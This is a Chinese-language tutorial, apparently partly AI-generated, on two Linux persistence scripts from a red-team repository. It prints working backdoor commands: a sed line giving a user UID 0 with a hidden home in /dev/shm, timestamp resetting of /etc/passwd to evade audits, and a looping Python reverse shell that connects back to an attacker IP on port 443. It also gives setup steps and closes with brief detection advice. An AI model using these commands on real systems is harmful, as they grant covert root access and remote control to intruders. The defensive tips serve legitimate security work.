红队持久化攻击全攻略:基于gh_mirrors/re/redteam的后门脚本实战 红队持久化攻击全攻略基于gh_mirrors/re/redteam的后门脚本实战【免费下载链接】redteamRed Team Scripts by d0nkeys (ex SnadoTeam)项目地址: https://gitcode.com/gh_mirrors/re/redteam在网络安全攻防对抗中持久化攻击是红队行动的关键环节。本文将以gh_mirrors/re/redteam项目为基础详细介绍两种实用的后门持久化技术帮助安全从业者理解攻击者常用的驻留手段提升防御能力。一、Linux系统下的伪root后门backdoor-passwd.sh深度解析1.1 核心功能与工作原理持久化攻击的核心在于创建不易被察觉的系统入口。项目中的backdoor-passwd.sh脚本通过修改系统用户配置文件实现了伪root权限的持久化。该脚本的精妙之处在于权限伪装将普通用户默认为uucp的UID和GID修改为0使其获得root权限痕迹清理通过恢复/etc/passwd和/etc/shadow文件的修改时间躲避时间戳检查隐蔽性增强在/dev/shm目录下创建隐藏家目录并禁用bash历史记录1.2 关键技术点解析脚本第22行使用sed命令修改用户配置sed -i s/.*${user}.*/${user}:x:0:0:${user}:\/dev\/shm\/.${user}:\/bin\/bash/ /etc/passwd这行代码将指定用户的UID/GID设为0并将家目录设置在内存文件系统中大大降低被发现的概率。密码设置与时间戳恢复是另一亮点echo ${user}:${password} | chpasswd touch -d ${mtime_passwd} /etc/passwd通过chpasswd命令设置密码后立即用touch命令恢复文件修改时间这是对抗日志审计的常用手段。二、隐蔽通信通道nohup.sh实现持久化反向连接2.1 脚本功能与优势persistence/nohup.sh提供了一种简单有效的持久化反向连接方案。与传统后门相比它具有以下优势进程后台化使用nohup命令确保进程在终端关闭后继续运行循环重连机制通过while true循环实现断连后自动重连多Python版本兼容自动检测系统中的Python版本提高兼容性2.2 核心代码解析脚本的核心部分实现了反向shell功能nohup /bin/bash -c while true; do \$(which python3 || which python2 || which python) -c import socket,subprocess,os;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\IP\,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);psubprocess.call([\/bin/bash\,\-i\]);; done 2/dev/null 这段代码通过Python创建TCP连接将标准输入/输出/错误重定向到攻击者控制的IP和端口默认443端口具有较好的隐蔽性实现反向shell功能。三、实战应用与防御建议3.1 环境准备与使用步骤使用这些持久化脚本前需完成以下准备工作克隆项目仓库git clone https://gitcode.com/gh_mirrors/re/redteam进入持久化脚本目录cd redteam/persistence为脚本添加执行权限chmod x backdoor-passwd.sh nohup.sh3.2 防御检测建议针对这类持久化攻击建议从以下方面加强防御文件完整性监控定期检查/etc/passwd和/etc/shadow文件的变化异常进程监控关注nohup进程和非常规路径的bash进程网络连接审计监控异常的 outbound 443端口连接用户权限审计定期检查UID0的用户列表特别是非默认用户四、总结与安全启示gh_mirrors/re/redteam项目中的持久化脚本展示了攻击者常用的技术手段。backdoor-passwd.sh通过修改用户配置实现权限持久化nohup.sh则通过反向连接保持控制通道。安全从业者应深入理解这些技术原理才能有效构建防御体系。持久化攻击的防御是一个持续的过程需要结合主机监控、网络分析和行为审计等多种手段才能在复杂的攻防对抗中占据主动。建议安全团队定期进行红队演练模拟真实攻击场景发现并弥补防御体系中的薄弱环节。【免费下载链接】redteamRed Team Scripts by d0nkeys (ex SnadoTeam)项目地址: https://gitcode.com/gh_mirrors/re/redteam创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考